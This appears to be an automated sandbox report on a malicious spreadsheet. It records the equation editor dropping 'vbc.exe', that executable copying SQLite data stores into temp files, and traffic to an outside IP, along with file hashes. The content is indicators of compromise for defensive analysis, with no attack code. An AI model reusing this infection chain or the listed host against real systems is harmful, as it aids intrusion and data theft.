Preview: AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGULFHOTUOYUSIVJEHUYPRYGESSFFMBWDPFRMTVBZEHTJSPRMDJISAZPMEWNGPGIXXTDNHCOBSXAWEFWRZNECKZGORELWMEPSAPLSTZZPUKXURSKTFSUSFEZMXMAIMRJZNGCVKLOHPVMZEIXIISXVMQHQTSADYWZQSWYVJHHONOOSZPQVWIUFMVXBXYCJOMERCQSVXERFAOOENLKARQGTECAIXOXEZPFDFJHYFCKLADMCWYOMCITRHMECVVVNPNTSRXYGYRKZUTOFNBMHDZWYHPYLTWEIGWOIGBTHWYGIXBCUDYMZMTZNYQMZLMXKPNFZDUEXXQLFJZZZVOPBEZKTKTJCTNUPRCNNGCPTIHKPTGBJLGUENNUGTZVMZJGQGUVBRLOJZECBLINEKGSIRFWZPWMVYJNEPWGYIAHKMJRBZMRVIBPONMHBDQZYFBHDDMYBZZAFEPAQFFUPIGGYNSPVXUWNNCWAUZXAGCATPNHNNYICDCRMTKRODUCDDFZKHLISLVOIFZPDTOSIEREFHYEWUBJKJRWXMZUGCPUXCPEXUQPWTSKEYSDPEICDQMMKUKJLDNQEHQQCYKRMWOUSJVTVSZJTFZCDVNUMEIZFWDNWCNCSCHBYNKRUSXPVMRIHGXDUPKXMZUIELSRXMZAEUNCCYZTEYLUYYRNSFUTHFESJOLGKJVGGNVJKSFSETAIHYOMLBOPRYAHSCATJUXNTWVZPEMECBVVHKHDELQRTQBEBXPJJ

C:\Users\user\AppData\Local\Temp\tmp3FAE.tmp

C:\Users\user\AppData\Local\Temp\tmp533A.tmp

C:\Users\user\AppData\Local\Temp\tmp6222.tmp

Process: C:\Users\Public\vbc.exe

File Type: SQLite 3.x database, last written using SQLite version 3032001

Category: dropped

Size (bytes): 40960

Entropy (8bit): 0.7798653713156546

Encrypted: false

SSDEEP: 48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u

MD5: CD5ACB5FAA79EEB4CDB481C6939EEC15

SHA1: 527F3091889C553B87B6BC0180E903E2931CCCFE

SHA-256: D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96

SHA-512: A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D

Malicious: false

Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\Public\vbc.exe

File Type: SQLite 3.x database, last written using SQLite version 3032001

Category: dropped

Size (bytes): 40960

Entropy (8bit): 0.7798653713156546

Encrypted: false

SSDEEP: 48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u

MD5: CD5ACB5FAA79EEB4CDB481C6939EEC15

SHA1: 527F3091889C553B87B6BC0180E903E2931CCCFE

SHA-256: D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96

SHA-512: A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D

Malicious: false

Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\Public\vbc.exe

File Type: SQLite 3.x database, last written using SQLite version 3032001

Category: dropped

Size (bytes): 40960

Entropy (8bit): 0.7798653713156546

Encrypted: false

SSDEEP: 48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u

MD5: CD5ACB5FAA79EEB4CDB481C6939EEC15

SHA1: 527F3091889C553B87B6BC0180E903E2931CCCFE

SHA-256: D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96

SHA-512: A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D

Malicious: false

Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\Public\vbc.exe

File Type: SQLite 3.x database, last written using SQLite version 3032001

Category: dropped

Size (bytes): 40960

Entropy (8bit): 0.7798653713156546

Encrypted: false

SSDEEP: 48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u

C:\Users\user\AppData\Local\Temp\tmp62EE.tmp

C:\Users\user\AppData\Local\Temp\tmp6417.tmp

C:\Users\user\AppData\Local\Temp\tmp64E3.tmp

MD5: CD5ACB5FAA79EEB4CDB481C6939EEC15

SHA1: 527F3091889C553B87B6BC0180E903E2931CCCFE

SHA-256: D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96

SHA-512: A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D

Malicious: false

Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\Public\vbc.exe

File Type: SQLite 3.x database, last written using SQLite version 3032001

Category: dropped

Size (bytes): 40960

Entropy (8bit): 0.7798653713156546

Encrypted: false

SSDEEP: 48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u

MD5: CD5ACB5FAA79EEB4CDB481C6939EEC15

SHA1: 527F3091889C553B87B6BC0180E903E2931CCCFE

SHA-256: D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96

SHA-512: A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D

Malicious: false

Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\Public\vbc.exe

File Type: SQLite 3.x database, last written using SQLite version 3032001

Category: dropped

Size (bytes): 40960

Entropy (8bit): 0.7798653713156546

Encrypted: false

SSDEEP: 48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u

MD5: CD5ACB5FAA79EEB4CDB481C6939EEC15

SHA1: 527F3091889C553B87B6BC0180E903E2931CCCFE

SHA-256: D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96

SHA-512: A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D

Malicious: false

Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\Public\vbc.exe

File Type: SQLite 3.x database, last written using SQLite version 3032001

Category: dropped

Size (bytes): 28672

Entropy (8bit): 0.9650411582864293

Encrypted: false

SSDEEP: 48:T2loMLOpEO5J/KdGU1jX983Gul4kEBrvK5GYWgqRSESXh:inNww9t9wGAE

MD5: 903C35B27A5774A639A90D5332EEF8E0

SHA1: 5A8CE0B6C13D1AF00837AA6CA1AA39000D4EB7CF

SHA-256: 1159B5AE357F89C56FA23C14378FF728251E6BDE6EEA979F528DB11C4030BE74

SHA-512: 076BD35B0D59FFA7A52588332A862814DDF049EE59E27542A2DA10E7A5340758B8C8ED2DEFE78C5B5A89EE54C19A89D49D2B86B49BF5542D76C1D4A378B40277

Malicious: false

C:\Users\user\AppData\Local\Temp\tmp66A8.tmp

C:\Users\user\AppData\Local\Temp\tmp67A3.tmp

C:\Users\user\AppData\Local\Temp\tmp6AC0.tmp

Preview: SQLite format 3......@ ..........................................................................C..........g...N......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\Public\vbc.exe

File Type: SQLite 3.x database, last written using SQLite version 3032001

Category: dropped

Size (bytes): 28672

Entropy (8bit): 0.9650411582864293

Encrypted: false

SSDEEP: 48:T2loMLOpEO5J/KdGU1jX983Gul4kEBrvK5GYWgqRSESXh:inNww9t9wGAE

MD5: 903C35B27A5774A639A90D5332EEF8E0

SHA1: 5A8CE0B6C13D1AF00837AA6CA1AA39000D4EB7CF

SHA-256: 1159B5AE357F89C56FA23C14378FF728251E6BDE6EEA979F528DB11C4030BE74

SHA-512: 076BD35B0D59FFA7A52588332A862814DDF049EE59E27542A2DA10E7A5340758B8C8ED2DEFE78C5B5A89EE54C19A89D49D2B86B49BF5542D76C1D4A378B40277

Malicious: false

Preview: SQLite format 3......@ ..........................................................................C..........g...N......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\Public\vbc.exe

File Type: SQLite 3.x database, last written using SQLite version 3032001

Category: dropped

Size (bytes): 77824

Entropy (8bit): 1.1340767975888557

Encrypted: false

SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi

MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6

SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7

SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C

SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D

Malicious: false

Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\Public\vbc.exe

File Type: SQLite 3.x database, last written using SQLite version 3032001

Category: dropped

Size (bytes): 77824

Entropy (8bit): 1.1340767975888557

Encrypted: false

SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi

MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6

SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7

SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C

SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D

Malicious: false

Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp6C85.tmp

C:\Users\user\AppData\Local\Temp\tmp7108.tmp

C:\Users\user\AppData\Local\Temp\tmp71C5.tmp

C:\Users\user\AppData\Local\Temp\tmp72BF.tmp

Process: C:\Users\Public\vbc.exe

File Type: SQLite 3.x database, last written using SQLite version 3032001

Category: dropped

Size (bytes): 77824

Entropy (8bit): 1.1340767975888557

Encrypted: false

SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi

MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6

SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7

SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C

SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D

Malicious: false

Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\Public\vbc.exe

File Type: SQLite 3.x database, last written using SQLite version 3032001

Category: dropped

Size (bytes): 77824

Entropy (8bit): 1.1340767975888557

Encrypted: false

SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi

MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6

SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7

SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C

SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D

Malicious: false

Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\Public\vbc.exe

File Type: SQLite 3.x database, last written using SQLite version 3032001

Category: dropped

Size (bytes): 77824

Entropy (8bit): 1.1340767975888557

Encrypted: false

SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi

MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6

SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7

SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C

SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D

Malicious: false

Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\Public\vbc.exe

File Type: SQLite 3.x database, last written using SQLite version 3032001

Category: dropped

Size (bytes): 77824

Entropy (8bit): 1.1340767975888557

C:\Users\user\AppData\Local\Temp\tmp738B.tmp

C:\Users\user\AppData\Local\Temp\tmp7486.tmp

C:\Users\user\AppData\Local\Temp\tmp7551.tmp

Encrypted: false

SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi

MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6

SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7

SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C

SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D

Malicious: false

Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\Public\vbc.exe

File Type: SQLite 3.x database, last written using SQLite version 3032001

Category: dropped

Size (bytes): 77824

Entropy (8bit): 1.1340767975888557

Encrypted: false

SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi

MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6

SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7

SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C

SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D

Malicious: false

Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\Public\vbc.exe

File Type: SQLite 3.x database, last written using SQLite version 3032001

Category: dropped

Size (bytes): 77824

Entropy (8bit): 1.1340767975888557

Encrypted: false

SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi

MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6

SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7

SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C

SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D

Malicious: false

Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\Public\vbc.exe

File Type: SQLite 3.x database, last written using SQLite version 3032001

Category: dropped

Size (bytes): 77824

Entropy (8bit): 1.1340767975888557

Encrypted: false

SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi

MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6

SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7

SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C

C:\Users\user\AppData\Local\Temp\tmp764C.tmp

C:\Users\user\AppData\Local\Temp\tmp7718.tmp

C:\Users\user\AppData\Local\Temp\tmp7841.tmp

SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D

Malicious: false

Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\Public\vbc.exe

File Type: SQLite 3.x database, last written using SQLite version 3032001

Category: dropped

Size (bytes): 77824

Entropy (8bit): 1.1340767975888557

Encrypted: false

SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi

MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6

SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7

SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C

SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D

Malicious: false


Process: C:\Users\Public\vbc.exe

File Type: SQLite 3.x database, last written using SQLite version 3032001

Category: dropped

Size (bytes): 77824

Entropy (8bit): 1.1340767975888557

Encrypted: false

SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi

MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6

SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7

SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C

SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D

Malicious: false


Process: C:\Users\Public\vbc.exe

File Type: SQLite 3.x database, last written using SQLite version 3032001

Category: dropped

Size (bytes): 77824

Entropy (8bit): 1.1340767975888557

Encrypted: false

SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi

MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6

SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7

SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C

SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D

Malicious: false


C:\Users\user\AppData\Local\Temp\tmp790D.tmp

C:\Users\user\AppData\Local\Temp\tmp79D9.tmp

C:\Users\user\AppData\Local\Temp\tmp7AA5.tmp


Process: C:\Users\Public\vbc.exe

File Type: SQLite 3.x database, user version 7, last written using SQLite version 3017000

Category: dropped

Size (bytes): 524288

Entropy (8bit): 0.08107860342777487

Encrypted: false

SSDEEP: 48:DO8rmWT8cl+fpNDId7r+gUEl1B6nB6UnUqc8AqwIhY5wXwwAVshT:DOUm7ii+7Ue1AQ98VVY

MD5: 1138F6578C48F43C5597EE203AFF5B27

SHA1: 9B55D0A511E7348E507D818B93F1C99986D33E7B

SHA-256: EEEDF71E8E9A3A048022978336CA89A30E014AE481E73EF5011071462343FFBF

SHA-512: 6D6D7ECF025650D3E2358F5E2D17D1EC8D6231C7739B60A74B1D8E19D1B1966F5D88CC605463C3E26102D006E84D853E390FFED713971DC1D79EB1AB6E56585E

Malicious: false


Process: C:\Users\Public\vbc.exe

File Type: SQLite 3.x database, user version 7, last written using SQLite version 3017000

Category: dropped

Size (bytes): 524288

Entropy (8bit): 0.08107860342777487

Encrypted: false

SSDEEP: 48:DO8rmWT8cl+fpNDId7r+gUEl1B6nB6UnUqc8AqwIhY5wXwwAVshT:DOUm7ii+7Ue1AQ98VVY

MD5: 1138F6578C48F43C5597EE203AFF5B27

SHA1: 9B55D0A511E7348E507D818B93F1C99986D33E7B

SHA-256: EEEDF71E8E9A3A048022978336CA89A30E014AE481E73EF5011071462343FFBF

SHA-512: 6D6D7ECF025650D3E2358F5E2D17D1EC8D6231C7739B60A74B1D8E19D1B1966F5D88CC605463C3E26102D006E84D853E390FFED713971DC1D79EB1AB6E56585E

Malicious: false


Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File Type: data

Category: dropped

Size (bytes): 512

Entropy (8bit): 0.0

Encrypted: false

SSDEEP: 3::

MD5: BF619EAC0CDF3F68D496EA9344137E8B

SHA1: 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5

SHA-256: 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560

SHA-512: DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE

Malicious: false


Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File Type: data

Category: dropped

Size (bytes): 512

Entropy (8bit): 0.0

Encrypted: false

SSDEEP: 3::

MD5: BF619EAC0CDF3F68D496EA9344137E8B

SHA1: 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5

SHA-256: 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560

SHA-512: DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE

Malicious: false

C:\Users\user\AppData\Local\Temp\tmp7BCE.tmp

C:\Users\user\AppData\Local\Temp\tmp7CF7.tmp

C:\Users\user\AppData\Local\Temp\~DF179744FD61C7CF51.TMP

C:\Users\user\AppData\Local\Temp\~DF26FE9B5EC11612F4.TMP

Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File Type: data

Category: dropped

Size (bytes): 512

Entropy (8bit): 0.0

Encrypted: false

SSDEEP: 3::

MD5: BF619EAC0CDF3F68D496EA9344137E8B

SHA1: 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5

SHA-256: 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560

SHA-512: DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE

Malicious: false


Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File Type: CDFV2 Encrypted

Category: dropped

Size (bytes): 190456

Entropy (8bit): 7.95591459608079

Encrypted: false

SSDEEP: 3072:q6+X3hQMFFQVv8V4J0aN0ZCQmVCzeKIhhw0J6il6qeFRJUVI0:yn6CCWVF20XECz9KIDgB

MD5: E9FFC84ABF7ED6F6A7BE0C9E347B4245

SHA1: D636A41A99A022B242A810C972F4E6ADCC779ABA

SHA-256: 03D548395841B2296DEE9A96F1ACA44337F238311A0B01D6CF61C0D998BCC59A

SHA-512: 66CD17A968D1DA8DDB4CD912EBA36F7148B44483BB9D5C49A8D855F226920BF01DB1D57E08CF051F571B27952732C5EBBD97CDC17A5672F5E2C17F088079B1BC

Malicious: false


Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File Type: data

Category: dropped

Size (bytes): 165

Entropy (8bit): 1.4377382811115937

Encrypted: false

SSDEEP: 3:vZ/FFDJw2fV:vBFFGS

MD5: 797869BB881CFBCDAC2064F92B26E46F

SHA1: 61C1B8FBF505956A77E9A79CE74EF5E281B01F4B

SHA-256: D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185

SHA-512: 1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D

Malicious: true

Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\AppData\Local\Temp\~DFAB0D2DA66A547388.TMP

C:\Users\user\AppData\Local\Temp\~DFEA839BB433B75553.TMP

C:\Users\user\Desktop\~$POAT2076452.xlsx

Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

Category: dropped

Size (bytes): 14336

Entropy (8bit): 5.171700803602097

Encrypted: false

SSDEEP: 192:uYzXW2Cwl0D1p62Ojdu8kYfDOJSxYINAJ5:uYbWkGXOjdu8k4DOY6TJ

MD5: 980EC4304344F277D722024ADE08CD01

SHA1: DBA030AEE01753EA3E5EF7C9E73725A306B6DBA5

SHA-256: 1BF69A60DFFFB6903E317E5D5DDC9DFCF24C250B6A2DEB9749785C509A986105

SHA-512: 222CAA856AB958EB7E0DF8AD41F0C9A5CE3EDD00FC10896058FB38A73A6CB897E3785862F0F1CD963D65CF5FE90E0E1A3A66E84F70C4BAF16762BC9192EEAD68

Malicious: true

Antivirus: ReversingLabs, Detection: 7%


C:\Users\Public\vbc.exe

Static File Info

General

File type: CDFV2 Encrypted

Entropy (8bit): 7.95591459608079

TrID: Generic OLE2 / Multistream Compound File (8008/1) 100.00%

File name: POAT2076452.xlsx

File size: 190456

MD5: e9ffc84abf7ed6f6a7be0c9e347b4245

SHA1: d636a41a99a022b242a810c972f4e6adcc779aba

SHA256: 03d548395841b2296dee9a96f1aca44337f238311a0b01d6cf61c0d998bcc59a

SHA512: 66cd17a968d1da8ddb4cd912eba36f7148b44483bb9d5c49a8d855f226920bf01db1d57e08cf051f571b27952732c5ebbd97cdc17a5672f5e2c17f088079b1bc

SSDEEP: 3072:q6+X3hQMFFQVv8V4J0aN0ZCQmVCzeKIhhw0J6il6qeFRJUVI0:yn6CCWVF20XECz9KIDgB

File Icon

Icon Hash: e4e2aa8aa4b4bcb4

Network Behavior

Network Port Distribution

Total Packets: 41

• 53 (DNS)

• 443 (HTTPS)

• 80 (HTTP)

TCP Packets

Timestamp Source Port Dest Port Source IP Dest IP

Feb 22, 2022 15:30:27.291577101 CET 49165 80 192.168.2.22 103.171.0.134

Feb 22, 2022 15:30:27.612147093 CET 80 49165 103.171.0.134 192.168.2.22

Feb 22, 2022 15:30:27.613080025 CET 49165 80 192.168.2.22 103.171.0.134

